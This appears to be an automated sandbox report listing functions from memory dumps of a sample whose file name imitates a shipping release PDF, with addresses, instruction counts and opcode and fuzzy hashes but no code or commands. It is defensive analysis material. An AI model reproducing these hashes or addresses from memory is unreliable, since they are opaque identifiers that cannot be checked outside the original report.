Function 04F9202C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dbc9e089184ec938d45776051ac2c735a04905529dcb49582f851b384d6792
Instruction ID: 06ea99e3c6da32aaef9775e9247393ba4874de0aac97c56aba9adbc567091aa2
Opcode Fuzzy Hash: 49dbc9e089184ec938d45776051ac2c735a04905529dcb49582f851b384d6792
Instruction Fuzzy Hash: F0E08632D401289FCF11AFF89C094EFFFB1DF19610B018166D865A7001D2710A13CBC0

Function 06B6E67B Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8177121a93b28c36febb06679ac80f8b6fe0b02efa37247c2a88ccd493121272
Instruction ID: f7ad746fa228238af87515a0356bdc0a8a5cc7b9fa3e58f74e717c2ec19ab3ed
Opcode Fuzzy Hash: 8177121a93b28c36febb06679ac80f8b6fe0b02efa37247c2a88ccd493121272
Instruction Fuzzy Hash: 74F0FEBC5803558FC754EBA4D848B997B76FB84600F1085D6954AA7714DA309D83DF90

Function 04F9C430 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35aed5b39db8ab3338fce97b807bf45ca56e97c89ed87a8fd835e94c202fa48b
Instruction ID: f2e20bd1c90ec7b5b0faf069c03d2a77bd661216d902b8c473c37c7c04035c1e
Opcode Fuzzy Hash: 35aed5b39db8ab3338fce97b807bf45ca56e97c89ed87a8fd835e94c202fa48b
Instruction Fuzzy Hash: A8D0A735B02285CBFE159B54DA05BB63F9AAF0070DF4C1028E509C076FDF46EF225151

Function 04F957B0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590a359c10b9a7a54a98ac7f46491d7a207022f362e451536bc0d895096c837b
Instruction ID: 8149b4761fac4b623142a43117cbd501ad505d7841dc98f1076308dae2ebe133
Opcode Fuzzy Hash: 590a359c10b9a7a54a98ac7f46491d7a207022f362e451536bc0d895096c837b
Instruction Fuzzy Hash: C5D0A7323042285B9F497BF87C4446E77CC9B456A5304007FE80EC2300DE219D034AC5

Function 06B6E17D Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa1f44ad5d416d5cb6b63a4a4109a98267944ae0185235fdb411cdd3b29422e
Instruction ID: 57c49f4695763721ea96825d7ae10a256939eb0c62799ea808b26b2fc145b35b
Opcode Fuzzy Hash: bfa1f44ad5d416d5cb6b63a4a4109a98267944ae0185235fdb411cdd3b29422e
Instruction Fuzzy Hash: 2DE086B8945115CFCB44EF98E5445AC3BBEFF44300B005664E116AB71DDB78D80B8F51

Function 06B6ACEB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef673edc0e86e2b7c8e785dec644c114ab8014ab6f57a8dbe6abc207878c4e50
Instruction ID: baf1cff1a7d8ef3dec24cef8b2063c49ea7584fec1b626ec77e6dbaf6601b150
Opcode Fuzzy Hash: ef673edc0e86e2b7c8e785dec644c114ab8014ab6f57a8dbe6abc207878c4e50
Instruction Fuzzy Hash: AEE07EB9A0475C8BDB44DFA5D9645ADBAF6BB4A300B109019E50EAB345E62459008B41

Function 06B6CC78 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc1e4512137694983a9cd3db7cc54a9b7a28974505d2017a4297ce3a2c1eb6ac
Instruction ID: e3cdcb20735022a23d3f905fc99096c5e4bea62714696769f296508e3f315a7c
Opcode Fuzzy Hash: dc1e4512137694983a9cd3db7cc54a9b7a28974505d2017a4297ce3a2c1eb6ac
Instruction Fuzzy Hash: F1E092B0D402099FD780EFAACA19A5EBFF4AB08600F1185AAD019E7221E77496458F91

Function 06B6C960 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 182eec6eb80d7f1d8a0cc5f5375b6dd2749b0efb7d2ac34486c05ea3be9e4f14
Instruction ID: d6391dab6a9b277df3aa5539f7fee58bcffb50cbcffbc3760fb55df829cab2e6
Opcode Fuzzy Hash: 182eec6eb80d7f1d8a0cc5f5375b6dd2749b0efb7d2ac34486c05ea3be9e4f14
Instruction Fuzzy Hash: 73E0C2B4C01208EFC715DFA4E5046ADBFB5FB06306F5080A9EA4857341C7359A50DBA4

Function 04F955B7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab369ffddc296ccf9571f445f3ed74c12fcf6a8c18e9fbc612224eb2d6302e17
Instruction ID: f71e7c5efa5b5d9688dc038cccd2199ff8205ff4b3bedfa593bd0c4012c54bde
Opcode Fuzzy Hash: ab369ffddc296ccf9571f445f3ed74c12fcf6a8c18e9fbc612224eb2d6302e17
Instruction Fuzzy Hash: 9DE0EC36140548AFCB028F64D885DE93F72EF59210F158499F9498B672C232C826DF10

Function 04F95020 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deb9d92838288baa5561ba9f5929d83fb9c8b15aabd683a0dd856afb67b59f3c
Instruction ID: 06ff4074e8cd1602e32de036159415f977bbef1fc6f3db5230ba109a34dba3cb
Opcode Fuzzy Hash: deb9d92838288baa5561ba9f5929d83fb9c8b15aabd683a0dd856afb67b59f3c
Instruction Fuzzy Hash: 17D09E3154E3C05FC7529B75C9997A5BF709F02204F6C05EAA584CB553D5184959C332

Function 04F9C440 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e8a1a0ad828f49b615e65f21954cb5fe8be45ab3bc9161c44e35122330b8a9
Instruction ID: 350106ca67604a6c90526fb06d819bed8fddfd82aae1c2b8839a84c17aff55cc
Opcode Fuzzy Hash: 84e8a1a0ad828f49b615e65f21954cb5fe8be45ab3bc9161c44e35122330b8a9
Instruction Fuzzy Hash: EFD0A930B0028A87EF184BA8A44463633DCAB00709B080029E40EC148AEA42FC139090

Function 04F957A1 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbe3069f02377bd07062ffa03cf12b32a644b1f5f930bae24ef27b20c87d613
Instruction ID: c925f71aa5c51ccae6d3c5355b47570b58ce427b35328d18f46268ab3a59f5e3
Opcode Fuzzy Hash: 3fbe3069f02377bd07062ffa03cf12b32a644b1f5f930bae24ef27b20c87d613
Instruction Fuzzy Hash: CED02233B04B186FD720DFACFCC1B0273CCDB00A60F18083AE808C2300EE10A91046D9

Function 04F92038 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction ID: 93513fc48263f46c943a8a24e41405279211dac07b096664d6adeebc3f17ddf8
Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
Instruction Fuzzy Hash: BCD05E72D00138A78B10AFE99C084DFFF79EF05650B418122E914A7101D3711A21DBC0

Function 06B6BE5B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a774bf40851cd9d9f4580ce441c1ad342db0da44f232348b6fcc0a20c085d9f
Instruction ID: dacc1417ff5280ef1b2b55e3103158c12459af38d7a3024df3ccb93f7f8664e5
Opcode Fuzzy Hash: 6a774bf40851cd9d9f4580ce441c1ad342db0da44f232348b6fcc0a20c085d9f
Instruction Fuzzy Hash: 85D09EF890C2158ED788DB6394400BABB79AE9A341B14E095914A92152EB3506558691

Function 06B6A2C0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0bf6af77289ac9242a2d6b28ecc621b670c301267f82095463bbeae1dc810e
Instruction ID: e95431cfd91f498c70ba438a5a342089351388ccf922282f80aff1063a78a4a0
Opcode Fuzzy Hash: 4f0bf6af77289ac9242a2d6b28ecc621b670c301267f82095463bbeae1dc810e
Instruction Fuzzy Hash: CDD022FA00664487C3226F9AF40C3953BAABB0232EF800020F30D57151C7BA9090CBB1

Function 06B68138 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e284b376a089af7846ba09befaa5e1b232f12ae8131386654f0efd4b4117cba
Instruction ID: 1b8be547e61285350925ea257f37a4c31ad34f94cb9ea196b3fe23ec6df9dc43
Opcode Fuzzy Hash: 8e284b376a089af7846ba09befaa5e1b232f12ae8131386654f0efd4b4117cba
Instruction Fuzzy Hash: B2D05EE150E6E48FC7620B7544683A07FE1AE5F610B4D12EAE2D28F163D5284551D722

Function 06B6BFB2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bda713f5f1844bee1f45f6be5ca90aa740562013292b8d462c704a5986ce47
Instruction ID: d729a613ff2171f625e562db89ac64c6413a066065301a81f0e6c8e58abfaced
Opcode Fuzzy Hash: c9bda713f5f1844bee1f45f6be5ca90aa740562013292b8d462c704a5986ce47
Instruction Fuzzy Hash: 98D017B8409210CFC3A15F60C4A46A13B7AFF0A211B0018D6E49E9F262DB3A8980CF61

Function 04F91640 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a07f483eedd7f425bde6ff978aae8a316d8536081fc1b438b79967a02fa19d0
Instruction ID: bd944301b9607ab918083a388af4d46a01af3aed95ee49ee3e8993919cdd7359
Opcode Fuzzy Hash: 4a07f483eedd7f425bde6ff978aae8a316d8536081fc1b438b79967a02fa19d0
Instruction Fuzzy Hash: D6D012A140C2C05FD78727344DB58907F61DE03204309C5DAD0C10B073CC12941BD72A

Function 06B66E59 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c47787f5c6db1b7571a199e2dd01cc3eb06ed8d2edc005f44d2acdb9b73fb1b
Instruction ID: fc6d9f2e2e565f806d2db90573945415ab9f8cbfad9345a24f5bbe00673ec259
Opcode Fuzzy Hash: 5c47787f5c6db1b7571a199e2dd01cc3eb06ed8d2edc005f44d2acdb9b73fb1b
Instruction Fuzzy Hash: 76C08C8A41E3C06EE35766748C216C32F20093735536B4093C2C1DB2A3C090840AC233

Function 04F955C8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90

Function 06B6A2D0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe3b4da72e6a5ca7fd9d47b334c1ac2b39f4aefbe9c84b1624ddf58bd66620a
Instruction ID: 799362e7ddf6158d2cfa263ac9781928d15f950e3660b1904bad44ba5835ebc0
Opcode Fuzzy Hash: 9fe3b4da72e6a5ca7fd9d47b334c1ac2b39f4aefbe9c84b1624ddf58bd66620a
Instruction Fuzzy Hash: FEC02BFA042A048BC3312F96F50C3243769BF0230BF400020F30C13411CBB55090C7B5

Function 04F90F22 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b77ee97c09ff48e241bdce455859cfa9a400411b73d6b1f61b56d41e45a72ed
Instruction ID: b4f4213b832a6a3378e85c7bca6af59401950e16cd3e504a8163dfb574cef8af
Opcode Fuzzy Hash: 8b77ee97c09ff48e241bdce455859cfa9a400411b73d6b1f61b56d41e45a72ed
Instruction Fuzzy Hash: CCC0924990D2C08FCB0303B01CBA6913FB09D9700039D80DB85C1CBE57D48D181FC321

Function 06B6A61C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2037a5e247d7eb99b72eab3219e139611dd0b2cd7bdb6317d1e645be63e00f9
Instruction ID: aca3535d25bb69dca6b09c7d84c434c183b92a9b688d7576f691babcc442ea95
Opcode Fuzzy Hash: a2037a5e247d7eb99b72eab3219e139611dd0b2cd7bdb6317d1e645be63e00f9
Instruction Fuzzy Hash: F4C01270901314DFDB50DF14E944B987B7AEF05200F0041D4D04D63115CE341D88CF40

Function 06B6565C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3f6ac4a40a882f7c984f0275ffefd8f979b0db668fe16c02c24942b61f68c4
Instruction ID: b2114e28f03ca3a32cbe7d7eb1c46f45d2c0060f3f21a95f7eba35f2425a7e07
Opcode Fuzzy Hash: ac3f6ac4a40a882f7c984f0275ffefd8f979b0db668fe16c02c24942b61f68c4
Instruction Fuzzy Hash: E4B012BA1E5340B9D504B268CD40E2BA540FFF6F41B108C26330AC01109474C828D26F

Function 04F94E9C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d344df1e18c8ff5ae5cd2d20b861b30bc83d4de038ef5abe0a2b204aa4d0c26
Instruction ID: 2824835c137061f2d9e3e1e7a3c69a44189e4581be4259f2e281df85f0d8b393
Opcode Fuzzy Hash: 2d344df1e18c8ff5ae5cd2d20b861b30bc83d4de038ef5abe0a2b204aa4d0c26
Instruction Fuzzy Hash: 4DB0122A658001137E08F2750ED053624DBABC03007C0DC101003A00044C18A80B9016

Function 04F95C0A Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e0b1c01ce4d986cbdf9828fc4126ae6275c56d7037cd0fc376b3e262b06643
Instruction ID: 3def5fd4627f37d20069a7f0e46c7bd740033cddb951c8d96e0a47b037fa2f24
Opcode Fuzzy Hash: c1e0b1c01ce4d986cbdf9828fc4126ae6275c56d7037cd0fc376b3e262b06643
Instruction Fuzzy Hash: F0A0025E50510112BB49F6B24D91E7628AB65D04187C8C654145264514CC2D96135422

Non-executed Functions

Function 06B6F5E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd94b8273af6c0e52c244885ba7254dfdfc51ee3eaf291e1f6856e41f6a4991e
Instruction ID: 2442a2392c2bbe6457bce758099187edadc839076ed8f2cad0e4e0195843deeb
Opcode Fuzzy Hash: dd94b8273af6c0e52c244885ba7254dfdfc51ee3eaf291e1f6856e41f6a4991e
Instruction Fuzzy Hash: 99E12CB4E012598FCB14DFA9D5809AEFBB2FF89305F24C1A9E414A7356C735A941CFA0

Function 06B6F1B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dea57e6cb61df3a1ec194b61e2c8ccad2de1c10bf208d14b971caa28023eaf
Instruction ID: f7c90109c78657b786cb0bfaf404c72fd69e3d8f1d3007100779f265c41d52a7
Opcode Fuzzy Hash: 05dea57e6cb61df3a1ec194b61e2c8ccad2de1c10bf208d14b971caa28023eaf
Instruction Fuzzy Hash: 0DE13BB4E012598FCB14DFA9D5809AEFBB2FF89305F2481A9E404A7315C735AD42CFA1

Function 06B6ED78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623365020686e10ff8fd097e911633a05fd5cfea3dbb0749670e64ddf7a8ac93
Instruction ID: d6a2878a1c0c3abe2ff0062caa7402b62c5f8b64ffee1057562e89f1abc6a412
Opcode Fuzzy Hash: 623365020686e10ff8fd097e911633a05fd5cfea3dbb0749670e64ddf7a8ac93
Instruction Fuzzy Hash: 80E13DB4E011198FDB14DFA9D5809AEFBF2FF88305F248199E414A7355D735A942CFA0

Function 06B6E940 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28d9e184b986fa199968802c08ecf6b052ca6182819f690f48477d25c53e37f
Instruction ID: 27ad9f14ab799c893c2fc8120ab3568ef1a09a1fb1cd1b1ef5c891d78390c245
Opcode Fuzzy Hash: d28d9e184b986fa199968802c08ecf6b052ca6182819f690f48477d25c53e37f
Instruction Fuzzy Hash: E3E13EB4E052198FCB14DF99C5809AEFBF2FF89305F2481A9E415AB355C735A942CFA0

Function 04F926D7 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b68d38dc19418301fe737c456b1bec3d88ced39344f57b0ebf26fca269e7f7
Instruction ID: 022b85fc2e7eae2c7f28ac037627d375386d3ac8e60fee46145fb48cafff3e5a
Opcode Fuzzy Hash: 02b68d38dc19418301fe737c456b1bec3d88ced39344f57b0ebf26fca269e7f7
Instruction Fuzzy Hash: B6D10931D1075ACACB41EB64D954AEDB7B1FF95300F11C79AE5093B224EB706ACACB81

Function 00ADF044 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460eeae6e430457a70d0789ec8b3d9b9d2378d14a87a660799748bd96c918d92
Instruction ID: 58ab5ce3d0833e484baffc78258201421487e692c0d1981218c4483757d85030
Opcode Fuzzy Hash: 460eeae6e430457a70d0789ec8b3d9b9d2378d14a87a660799748bd96c918d92
Instruction Fuzzy Hash: 20A12836E002098FCF05DFA5C94459EB7B2FF85300B15857AE907AB366EB71E956CB80

Function 04F926E8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8639129e19a0e98aa6ba58bbb39952fd757542a19c0d7555a50a614e66f8dc6
Instruction ID: f966b361a901578209b03023c678b9ba25bdcd5957ad9fb8b55c2c1785138540
Opcode Fuzzy Hash: d8639129e19a0e98aa6ba58bbb39952fd757542a19c0d7555a50a614e66f8dc6
Instruction Fuzzy Hash: A8D1F931D1075ACACB41EF64D954AADB7B1FF95300F21C79AE5093B224EB706AC9CB81

Function 06B6ED68 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2282b61f68b5f9e6dae694f85b6d10e50e5da26c74ab08258a4b4fdeb23ffb0
Instruction ID: 8430c0189a1119e120d66bf7af2ca6f211ca5c182c0f7b524afe3070a99982e1
Opcode Fuzzy Hash: a2282b61f68b5f9e6dae694f85b6d10e50e5da26c74ab08258a4b4fdeb23ffb0
Instruction Fuzzy Hash: 74513AB4E052198FDB14CFAAC5405AEFBF2FF89304F2481A9E418A7356D7359942CFA0

Function 04F98310 Relevance: 41.7, Strings: 33, Instructions: 442COMMON

Download Yara Rule

Strings

4']q, xrefs: 04F98843
4']q, xrefs: 04F986E3
4']q, xrefs: 04F984E7
4']q, xrefs: 04F98793
4']q, xrefs: 04F98668
4']q, xrefs: 04F98550
4']q, xrefs: 04F987BF
4']q, xrefs: 04F9847E
4']q, xrefs: 04F985DC
4']q, xrefs: 04F98767
4']q, xrefs: 04F98817
4']q, xrefs: 04F9850A
4']q, xrefs: 04F984A1
4']q, xrefs: 04F9873B
4']q, xrefs: 04F98415
4']q, xrefs: 04F98438
4']q, xrefs: 04F985B9
4']q, xrefs: 04F983F2
4']q, xrefs: 04F98645
4']q, xrefs: 04F98622
4']q, xrefs: 04F9868B
4']q, xrefs: 04F985FF
4']q, xrefs: 04F986B7
4']q, xrefs: 04F98573
4']q, xrefs: 04F9845B
4']q, xrefs: 04F9852D
4']q, xrefs: 04F98596
4']q, xrefs: 04F988C7
4']q, xrefs: 04F9886F
4']q, xrefs: 04F984C4
4']q, xrefs: 04F9889B
4']q, xrefs: 04F9870F
